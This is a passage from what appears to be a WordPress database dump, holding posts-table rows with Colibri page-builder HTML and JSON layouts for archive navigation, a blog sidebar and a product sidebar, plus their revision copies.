align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]\n <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <hop-archive-navigation previewid=\"639-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_search','','inherit','closed','closed','','40-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',40,'https://gsudice.dataconn.net/?p=42',0,'revision','',0),(43,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div disabled-ui=\"true\" data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-component=\"widget-area\" data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n <!---->\n <div class=\"widget-shortcode h-global-transition-all\">[colibri_widget_area id=\"sidebar-1\"]</div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','sidebar_post','','publish','closed','closed','','43','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_sidebar&p=43',0,'extb_post_sidebar','',0),(44,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-sidebar\",\"id\":\"43-s1\",\"partialId\":43,\"styleRef\":160,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"43-s15\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":164,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"43-s16\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":165,\"type\":\"sidebar\"}],\"id\":\"43-s14\",\"parentId\":\"43-s13\",\"partialId\":43,\"styleRef\":163,\"type\":\"sidebar\"}],\"id\":\"43-s13\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":162,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"43-s4\",\"parentId\":\"43-s3\",\"partialId\":43,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"sidebar-1\"},\"id\":\"43-s5\",\"parentId\":\"43-s4\",\"partialId\":43,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"43-s6\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":169,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"43-s7\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":170,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"43-s8\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":171,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"43-s9\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":172,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"43-s10\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":173,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"43-s11\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":174,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"43-s12\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":175,\"type\":\"sidebar\"}],\"styleRef\":168,\"type\":\"sidebar\"}],\"styleRef\":167,\"type\":\"sidebar\"}],\"id\":\"43-s3\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":166,\"type\":\"sidebar\"}],\"parentId\":\"43-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\"Blog Sidebar\",\"attrs\":{\"id\":\"blog-sidebar\"}},\"id\":\"43-s2\",\"partialId\":43,\"styleRef\":161}]}','','','publish','closed','closed','','44','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=44',0,'extb_post_json','',0),(45,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"sidebar-1\"]</div>\n <div data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','sidebar_post','','inherit','closed','closed','','43-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',43,'https://gsudice.dataconn.net/?p=45',0,'revision','',0),(46,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div disabled-ui=\"true\" data-colibri-id=\"46-s1\" class=\"style-176 style-local-46-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"46-s2\" id=\"product-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-177 style-local-46-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"46-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-182 style-local-46-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-183-outer style-local-46-s4-outer\">\n <div data-colibri-id=\"46-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-183 style-local-46-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-component=\"widget-area\" data-colibri-id=\"46-s5\" class=\"h-widget-area style-184 style-local-46-s5 position-relative h-element\">\n <!---->\n <div class=\"widget-shortcode h-global-transition-all\">[colibri_widget_area id=\"ecommerce-left\"]</div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-aos-selector=\".widget\" data-colibri-id=\"46-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','sidebar_product','','publish','closed','closed','','46','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_sidebar&p=46',0,'extb_post_sidebar','',0),(47,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-sidebar\",\"id\":\"46-s1\",\"partialId\":46,\"styleRef\":176,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"46-s15\",\"parentId\":\"46-s14\",\"partialId\":46,\"styleRef\":180,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"46-s16\",\"parentId\":\"46-s14\",\"partialId\":46,\"styleRef\":181,\"type\":\"sidebar\"}],\"id\":\"46-s14\",\"parentId\":\"46-s13\",\"partialId\":46,\"styleRef\":179,\"type\":\"sidebar\"}],\"id\":\"46-s13\",\"parentId\":\"46-s2\",\"partialId\":46,\"styleRef\":178,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"46-s4\",\"parentId\":\"46-s3\",\"partialId\":46,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"ecommerce-left\"},\"id\":\"46-s5\",\"parentId\":\"46-s4\",\"partialId\":46,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"46-s6\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":185,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"46-s7\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":186,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"46-s8\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":187,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"46-s9\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":188,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"46-s10\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":189,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"46-s11\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":190,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"46-s12\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":191,\"type\":\"sidebar\"}],\"styleRef\":184,\"type\":\"sidebar\"}],\"styleRef\":183,\"type\":\"sidebar\"}],\"id\":\"46-s3\",\"parentId\":\"46-s2\",\"partialId\":46,\"styleRef\":182,\"type\":\"sidebar\"}],\"parentId\":\"46-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\" Woo Sidebar\",\"attrs\":{\"id\":\"product-sidebar\"}},\"id\":\"46-s2\",\"partialId\":46,\"styleRef\":177}]}','','','publish','closed','closed','','47','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=47',0,'extb_post_json','',0),(48,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"46-s1\" class=\"style-176 style-local-46-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"46-s2\" id=\"product-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-177 style-local-46-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"46-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-182 style-local-46-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-183-outer style-local-46-s4-outer\">\n <div data-colibri-id=\"46-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-183 style-local-46-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"46-s5\" class=\"h-widget-area style-184 style-local-46-s5 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"ecommerce-left\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>','sidebar_product','','inherit','closed','closed','','46-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',46,'https://gsudice.dataconn.net/?p=48',0,'revision','',0),(49,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-sidebar\",\"id\":\"43-s1\",\"partialId\":43,\"styleRef\":160,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"43-s15\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":164,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"43-s16\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":165,\"type\":\"sidebar\"}],\"id\":\"43-s14\",\"parentId\":\"43-s13\",\"partialId\":43,\"styleRef\":163,\"type\":\"sidebar\"}],\"id\":\"43-s13\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":162,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"43-s4\",\"parentId\":\"43-s3\",\"partialId\":43,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"sidebar-1\"},\"id\":\"43-s5\",\"parentId\":\"43-s4\",\"partialId\":43,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"43-s6\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":169,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"43-s7\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":170,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"43-s8\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":171,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"43-s9\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":172,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"43-s10\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":173,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"43-s11\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":174,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"43-s12\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":175,\"type\":\"sidebar\"}],\"styleRef\":168,\"type\":\"sidebar\"}],\"styleRef\":167,\"type\":\"sidebar\"}],\"id\":\"43-s3\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":166,\"type\":\"sidebar\"}],\"parentId\":\"43-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\"Blog Sidebar\",\"attrs\":{\"id\":\"blog-sidebar\"}},\"id\":\"43-s2\",\"partialId\":43,\"styleRef\":161}]}','','','inherit','closed','closed','','44-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',44,'https://gsudice.dataconn.net/?p=49',0,'revision','',0),(50,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"sidebar-1\"]</div>\n <div data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','sidebar_post','','inherit','closed','closed','','43-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',43,'https://gsudice.dataconn.net/?p=50',0,'revision','',0),(51,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-sidebar\",\"id\":\"46-s1\",\"partialId\":46,\"styleRef\":176,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"46-s15\",\"parentId\":\"46-s14\",\"partialId\":46,\"styleRef\":180,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"46-s16\",\"parentId\":\"46-s14\",\"partialId\":46,\"styleRef\":181,\"type\":\"sidebar\"}],\"id\":\"46-s14\",\"parentId\":\"46-s13\",\"partialId\":46,\"styleRef\":179,\"type\":\"sidebar\"}],\"id\":\"46-s13\",\"parentId\":\"46-s2\",\"partialId\":46,\"styleRef\":178,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"46-s4\",\"parentId\":\"46-s3\",\"partialId\":46,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"ecommerce-left\"},\"id\":\"46-s5\",\"parentId\":\"46-s4\",\"partialId\":46,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"46-s6\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":185,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"46-s7\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":186,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"46-s8\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":187,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"46-s9\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":188,\"type\":\"sidebar\"},{\